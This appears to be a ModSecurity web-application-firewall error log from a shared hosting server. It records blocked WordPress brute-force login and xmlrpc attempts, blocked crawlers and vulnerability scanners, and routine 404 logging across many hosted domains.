[Tue May 26 17:24:41.813487 2026] [security2:error] [pid 882219:tid 882365] [client 160.250.132.165:63649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.kexcouriers.com"] [uri "/wp-login.php"] [unique_id "ahWKAZ8tTkZcqimiXcT8GgAAAJU"]
[Tue May 26 17:24:41.841406 2026] [security2:error] [pid 882219:tid 882378] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKAZ8tTkZcqimiXcT8EAAAAKI"]
[Tue May 26 17:24:42.655312 2026] [security2:error] [pid 882219:tid 882436] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKAp8tTkZcqimiXcT8KAAAANw"]
[Tue May 26 17:24:43.874092 2026] [security2:error] [pid 882219:tid 882354] [client 160.250.132.165:64828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcalendars.canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWKA58tTkZcqimiXcT8UAAAAIo"]
[Tue May 26 17:24:44.146294 2026] [security2:error] [pid 882219:tid 882368] [client 203.194.101.7:55295] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKBJ8tTkZcqimiXcT8WAAAAJg"]
[Tue May 26 17:24:44.146427 2026] [security2:error] [pid 882219:tid 882368] [client 203.194.101.7:55295] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKBJ8tTkZcqimiXcT8WAAAAJg"]
[Tue May 26 17:24:44.642203 2026] [security2:error] [pid 882219:tid 882438] [client 223.235.98.214:28293] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKBJ8tTkZcqimiXcT8ZAAAAN4"]
[Tue May 26 17:24:44.642378 2026] [security2:error] [pid 882219:tid 882438] [client 223.235.98.214:28293] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKBJ8tTkZcqimiXcT8ZAAAAN4"]
[Tue May 26 17:24:44.703018 2026] [security2:error] [pid 882219:tid 882400] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKBJ8tTkZcqimiXcT8XQAAALg"]
[Tue May 26 17:24:45.928595 2026] [security2:error] [pid 882219:tid 882369] [client 160.250.132.165:49646] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpanel.yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWKBZ8tTkZcqimiXcT8hwAAAJk"]
[Tue May 26 17:24:47.327774 2026] [security2:error] [pid 882219:tid 882449] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKBp8tTkZcqimiXcT8nQAAAOk"]
[Tue May 26 17:24:47.955023 2026] [security2:error] [pid 882219:tid 882388] [client 160.250.132.165:50828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "omshriinfrastructures.com"] [uri "/wp-login.php"] [unique_id "ahWKB58tTkZcqimiXcT8vgAAAKw"]
[Tue May 26 17:24:49.764563 2026] [security2:error] [pid 882219:tid 882350] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKCZ8tTkZcqimiXcT86QAAAIY"]
[Tue May 26 17:24:49.909743 2026] [security2:error] [pid 882219:tid 882447] [client 216.244.66.241:37918] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/astircabd/fceeeb1205581.shtml"] [unique_id "ahWKCZ8tTkZcqimiXcT8_QAAAOc"]
[Tue May 26 17:24:49.909863 2026] [security2:error] [pid 882219:tid 882447] [client 216.244.66.241:37918] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/astircabd/fceeeb1205581.shtml"] [unique_id "ahWKCZ8tTkZcqimiXcT8_QAAAOc"]
[Tue May 26 17:24:49.953721 2026] [security2:error] [pid 882219:tid 882381] [client 160.250.132.165:51884] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lifestylemne.me.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKCZ8tTkZcqimiXcT8_AAAAKU"]
[Tue May 26 17:24:52.044126 2026] [security2:error] [pid 882219:tid 882357] [client 160.250.132.165:53212] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWKDJ8tTkZcqimiXcT9NwAAAI0"]
[Tue May 26 17:24:52.068645 2026] [security2:error] [pid 882219:tid 882405] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKC58tTkZcqimiXcT9MwAAAL0"]
[Tue May 26 17:24:53.812992 2026] [security2:error] [pid 882219:tid 882468] [client 160.250.132.165:54268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "420ganjaonline.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKDZ8tTkZcqimiXcT9cAAAAPw"]
[Tue May 26 17:24:54.456461 2026] [security2:error] [pid 882219:tid 882374] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKDZ8tTkZcqimiXcT9dgAAAJ4"]
[Tue May 26 17:24:54.558663 2026] [security2:error] [pid 882219:tid 882403] [client 203.194.101.7:55621] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKDp8tTkZcqimiXcT9gQAAALs"]
[Tue May 26 17:24:54.558797 2026] [security2:error] [pid 882219:tid 882403] [client 203.194.101.7:55621] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKDp8tTkZcqimiXcT9gQAAALs"]
[Tue May 26 17:24:55.341841 2026] [security2:error] [pid 882219:tid 882355] [client 223.235.98.214:32154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKD58tTkZcqimiXcT9nAAAAIs"]
[Tue May 26 17:24:55.342037 2026] [security2:error] [pid 882219:tid 882355] [client 223.235.98.214:32154] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKD58tTkZcqimiXcT9nAAAAIs"]
[Tue May 26 17:24:55.887773 2026] [security2:error] [pid 882219:tid 882423] [client 160.250.132.165:55512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "proxuber.com"] [uri "/wp-login.php"] [unique_id "ahWKD58tTkZcqimiXcT9sgAAAM8"]
[Tue May 26 17:24:56.747119 2026] [security2:error] [pid 882219:tid 882369] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKEJ8tTkZcqimiXcT9wQAAAJk"]
[Tue May 26 17:24:57.764432 2026] [security2:error] [pid 882219:tid 882426] [client 160.250.132.165:56588] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.msjexim.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKEZ8tTkZcqimiXcT92wAAANI"]
[Tue May 26 17:24:58.349947 2026] [security2:error] [pid 882219:tid 882411] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKEZ8tTkZcqimiXcT95gAAAMM"]
[Tue May 26 17:24:59.312217 2026] [security2:error] [pid 882219:tid 882379] [client 182.161.73.20:43689] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.73.161.182.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahWKE58tTkZcqimiXcT-BgAAAKM"]
[Tue May 26 17:24:59.312406 2026] [security2:error] [pid 882219:tid 882379] [client 182.161.73.20:43689] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "409"] [hostname "www.samayikprasanga.in"] [uri "/archive.php"] [unique_id "ahWKE58tTkZcqimiXcT-BgAAAKM"]
[Tue May 26 17:24:59.564756 2026] [security2:error] [pid 882219:tid 882458] [client 160.250.132.165:57578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.grappyfilms.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKE58tTkZcqimiXcT-DQAAAPI"]
[Tue May 26 17:25:01.392333 2026] [security2:error] [pid 882219:tid 882403] [client 160.250.132.165:58624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.sitesholic.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKFZ8tTkZcqimiXcT-QwAAALs"]
[Tue May 26 17:25:01.407823 2026] [security2:error] [pid 882219:tid 882406] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKFJ8tTkZcqimiXcT-OQAAAL4"]
[Tue May 26 17:25:03.205302 2026] [security2:error] [pid 882219:tid 882367] [client 160.250.132.165:59654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.ktmadvance-senegal.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKF58tTkZcqimiXcT-dAAAAJc"]
[Tue May 26 17:25:03.584087 2026] [security2:error] [pid 882219:tid 882339] [remote 160.250.186.220:40902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWKF58tTkZcqimiXcT-ewAA73c"]
[Tue May 26 17:25:03.626291 2026] [security2:error] [pid 882219:tid 882389] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKF58tTkZcqimiXcT-eQAAAK0"]
[Tue May 26 17:25:04.060059 2026] [security2:error] [pid 882219:tid 882375] [client 114.119.157.241:22329] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "dgssi.in"] [uri "/dgssi-consistories-list.php"] [unique_id "ahWKGJ8tTkZcqimiXcT-kQAAAJ8"], referer: https://dgssi.in/
[Tue May 26 17:25:04.692292 2026] [security2:error] [pid 882219:tid 882370] [client 203.194.101.7:55946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKGJ8tTkZcqimiXcT-ogAAAJo"]
[Tue May 26 17:25:04.692473 2026] [security2:error] [pid 882219:tid 882370] [client 203.194.101.7:55946] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKGJ8tTkZcqimiXcT-ogAAAJo"]
[Tue May 26 17:25:04.864053 2026] [security2:error] [pid 882219:tid 882471] [client 74.7.228.0:42154] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.pstta.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWKGJ8tTkZcqimiXcT-pgAA_wU"]
[Tue May 26 17:25:05.020958 2026] [security2:error] [pid 882219:tid 882408] [client 160.250.132.165:60695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.debatenigeria.org.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKGZ8tTkZcqimiXcT-pwAAAMA"]
[Tue May 26 17:25:05.839036 2026] [security2:error] [pid 882219:tid 882380] [client 223.235.98.214:21441] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKGZ8tTkZcqimiXcT-uwAAAKQ"]
[Tue May 26 17:25:05.839769 2026] [security2:error] [pid 882219:tid 882380] [client 223.235.98.214:21441] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKGZ8tTkZcqimiXcT-uwAAAKQ"]
[Tue May 26 17:25:06.060457 2026] [security2:error] [pid 882219:tid 882386] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKGZ8tTkZcqimiXcT-twAAAKo"]
[Tue May 26 17:25:06.803018 2026] [security2:error] [pid 882219:tid 882355] [client 160.250.132.165:61718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.careerslngulf.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKGp8tTkZcqimiXcT-zgAAAIs"]
[Tue May 26 17:25:08.620668 2026] [security2:error] [pid 882219:tid 882419] [client 160.250.132.165:62720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.budgetyatraa.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKHJ8tTkZcqimiXcT-_gAAAMs"]
[Tue May 26 17:25:08.677282 2026] [security2:error] [pid 882219:tid 882366] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKHJ8tTkZcqimiXcT-8QAAAJY"]
[Tue May 26 17:25:08.918121 2026] [security2:error] [pid 882219:tid 882234] [remote 103.11.102.106:34836] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWKHJ8tTkZcqimiXcT_AgAA9A4"]
[Tue May 26 17:25:10.509335 2026] [security2:error] [pid 882219:tid 882462] [client 160.250.132.165:63756] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.empoli.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKHp8tTkZcqimiXcT_MgAAAPY"]
[Tue May 26 17:25:10.573952 2026] [security2:error] [pid 882219:tid 882385] [client 74.7.241.140:41660] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "ecosol.plus"] [uri "/cgi-sys/404.html"] [unique_id "ahWKHp8tTkZcqimiXcT_NAAAqXM"]
[Tue May 26 17:25:10.953406 2026] [security2:error] [pid 882219:tid 882367] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKHp8tTkZcqimiXcT_MAAAAJc"]
[Tue May 26 17:25:12.324827 2026] [security2:error] [pid 882219:tid 882241] [remote 87.106.70.198:37778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.70.106.87.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWKIJ8tTkZcqimiXcT_VwAA3RU"]
[Tue May 26 17:25:12.434894 2026] [security2:error] [pid 882219:tid 882431] [client 160.250.132.165:64840] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.glorodavionics.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKIJ8tTkZcqimiXcT_YQAAANc"]
[Tue May 26 17:25:13.121235 2026] [security2:error] [pid 882219:tid 882433] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKIJ8tTkZcqimiXcT_agAAANk"]
[Tue May 26 17:25:14.258603 2026] [security2:error] [pid 882219:tid 882416] [client 160.250.132.165:49534] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "manola.co.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKIp8tTkZcqimiXcT_nwAAAMg"]
[Tue May 26 17:25:14.328407 2026] [security2:error] [pid 882219:tid 882427] [client 35.227.32.6:58606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 6.32.227.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahWKIp8tTkZcqimiXcT_mQAAANM"]
[Tue May 26 17:25:14.328542 2026] [security2:error] [pid 882219:tid 882427] [client 35.227.32.6:58606] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahWKIp8tTkZcqimiXcT_mQAAANM"]
[Tue May 26 17:25:15.090801 2026] [security2:error] [pid 882219:tid 882445] [client 203.194.101.7:56281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKI58tTkZcqimiXcT_tAAAAOU"]
[Tue May 26 17:25:15.091073 2026] [security2:error] [pid 882219:tid 882445] [client 203.194.101.7:56281] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKI58tTkZcqimiXcT_tAAAAOU"]
[Tue May 26 17:25:15.709253 2026] [security2:error] [pid 882219:tid 882425] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKI58tTkZcqimiXcT_vgAAANE"]
[Tue May 26 17:25:15.955923 2026] [security2:error] [pid 882219:tid 882400] [client 160.250.132.165:50452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "onlineitmaster.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKI58tTkZcqimiXcT_zgAAALg"]
